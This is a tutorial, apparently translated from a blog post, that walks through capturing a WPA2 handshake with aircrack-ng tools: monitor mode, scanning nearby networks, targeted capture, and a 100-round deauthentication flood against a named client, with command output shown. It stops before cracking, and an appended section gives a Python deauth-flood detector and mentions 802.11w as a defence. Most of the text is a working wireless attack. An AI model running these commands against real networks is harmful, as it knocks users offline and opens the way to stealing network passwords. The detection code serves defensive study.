1: Confirm the wireless interface name: iwconfig

2: Put the card into monitor mode: airmon-ng start wlan0

Note!

If this step fails with: ERROR adding monitor mode interface: command failed: Operation not supported (-95).

This is a Broadcom (brcmfmac) driver issue and can be resolved by reloading the module as follows.

sudo rmmod brcmfmac

sudo modprobe brcmfmac

3: Scan for nearby Wi-Fi networks: airodump-ng wlan0mon. For example, the scan returns the following results:

BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

58:41:20:A9:B8:F6 -82 3 0 0 1 540 WPA2 CCMP PSK TP-LINK_B8F6ZM
E2:95:49:AE:9D:CB -83 3 0 0 1 400 WPA2 CCMP PSK HUAWEI-1A1HZ3
74:45:2D:21:17:E8 -83 2 0 0 6 360 WPA2 CCMP PSK HUAWEI-888
24:06:F2:15:BB:11 -67 5 0 0 10 130 WPA2 CCMP PSK CU_PsRx
BC:54:FC:29:3E:0A -85 2 0 0 13 270 WPA2 CCMP PSK MERCURY_6413
B0:45:02:86:79:7C -81 4 0 0 6 360 WPA2 CCMP PSK HUAWEI-0E1H2P

The example below uses 74:45:2D:21:17:E8 -83 2 0 0 6 360 WPA2 CCMP PSK HUAWEI-888.

4: Capture the traffic of one specific Wi-Fi network: airodump-ng -w tplink -c 6 --bssid 74:45:2D:21:17:E8 wlan0mon, where -w (the capture file prefix) can just be a fixed value, used here as a bit of disguise, -c is the channel, and --bssid is the MAC address of the access point being tested.

We get the following client:

BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

74:45:2D:21:17:E8 -74 48 186 11 0 6 360 WPA2 CCMP PSK HUAWEI-888

BSSID STATION PWR Rate Lost Frames Notes Probes

74:45:2D:21:17:E8 E0:BA:AD:27:9A:00 -1 1e- 0 0 1

Do not close this window!

5: Be sure to open a new window! In it, attack the client of this wireless network to capture the handshake. During this process the client keeps trying to reconnect to the Wi-Fi and has no network connectivity, so this can be regarded as an alternative form of attack; of course we don't want to attack the client, what we want is the penetration test.
Here -0 is the number of deauthentication rounds (it can be set fairly high), -a is the MAC address of the Wi-Fi access point, and -c is the MAC address of the client connected to that access point.

$ sudo aireplay-ng -0 100 -a 74:45:2D:21:17:E8 -c E0:BA:AD:27:9A:00 wlan0mon
05:35:34 Waiting for beacon frame (BSSID: 74:45:2D:21:17:E8) on channel 6
05:35:34 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:35 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:35 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:36 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:36 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 1 ACKs]
05:35:37 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:38 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:38 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 1 ACKs]
05:35:39 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:39 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:40 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:40 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:41 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:41 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]
05:35:42 Sending 64 directed DeAuth (code 7). STMAC: [E0:BA:AD:27:9A:00] [ 0| 0 ACKs]

6: Go back to the previous window. The Wi-Fi status now shows a large Lost count for the client:

BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

74:45:2D:21:17:E8 -40 51 438 97 0 6 360 WPA2 CCMP PSK HUAWEI-888

BSSID STATION PWR Rate Lost Frames Notes Probes

74:45:2D:21:17:E8 E0:BA:AD:27:9A:00 -82 1e- 1 1030 29437

If the text WPA handshake: E0:BA:AD:27:9A:00 appears, the handshake has been captured, and it is saved to the xxx.cap file named in the prompt.

7: Ah, what comes next is cracking this xxx.cap file. That is too shady, so I won't go into it; once it is cracked you have the connection password for this Wi-Fi.
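The symptom in step 6 (bursts of directed deauthentication frames with reason code 7, followed by the client losing frames) is also the signal a wireless IDS uses to detect this attack. Below is an added Python example, not code from the original post, that runs a sliding-window deauth-flood detector over constructed 802.11 management-frame records; the record format, the window length and the threshold are assumptions.

```python
from collections import deque, defaultdict

# Reason code seen in the aireplay-ng output above ("Class 3 frame received
# from nonassociated STA"); real APs send it rarely, floods of it are a tell.
REASON_CLASS3_NONASSOC = 7

# Thresholds are assumptions: alert when one (bssid, station) pair receives
# more than MAX_DEAUTH deauth/disassoc frames within WINDOW_SECONDS.
WINDOW_SECONDS = 2.0
MAX_DEAUTH = 20


def detect_deauth_floods(frames, window=WINDOW_SECONDS, threshold=MAX_DEAUTH):
    """Return one alert dict per (bssid, station) pair hit by a deauth flood.

    `frames` are dicts {ts, subtype, bssid, sta, reason} in time order, as a
    sniffer in monitor mode would deliver them (subtype "deauth"/"disassoc"
    are the interesting ones; everything else is ignored).
    """
    recent = defaultdict(deque)  # (bssid, sta) -> timestamps inside the window
    alerted, alerts = set(), []
    for f in frames:
        if f["subtype"] not in ("deauth", "disassoc"):
            continue
        key = (f["bssid"].upper(), f["sta"].upper())
        q = recent[key]
        q.append(f["ts"])
        while f["ts"] - q[0] > window:   # slide the window forward
            q.popleft()
        if len(q) > threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"bssid": key[0], "sta": key[1], "count": len(q),
                           "first_ts": q[0], "last_ts": f["ts"],
                           "reason": f["reason"]})
    return alerts


def constructed_capture():
    """Constructed sample: one benign deauth to another client, then a burst
    modelled on the aireplay-ng run above (64 directed deauths in one second,
    reason code 7), then a normal data frame."""
    ap, sta = "74:45:2D:21:17:E8", "E0:BA:AD:27:9A:00"
    frames = [{"ts": 0.0, "subtype": "deauth", "bssid": ap,
               "sta": "AA:BB:CC:00:11:22", "reason": 3}]
    for i in range(64):
        frames.append({"ts": 5.0 + i / 64, "subtype": "deauth", "bssid": ap,
                       "sta": sta, "reason": REASON_CLASS3_NONASSOC})
    frames.append({"ts": 6.5, "subtype": "data", "bssid": ap, "sta": sta,
                   "reason": None})
    return frames
```

Enabling 802.11w (Protected Management Frames) on the access point and its clients makes spoofed deauthentication frames fail their integrity check, so clients simply ignore them.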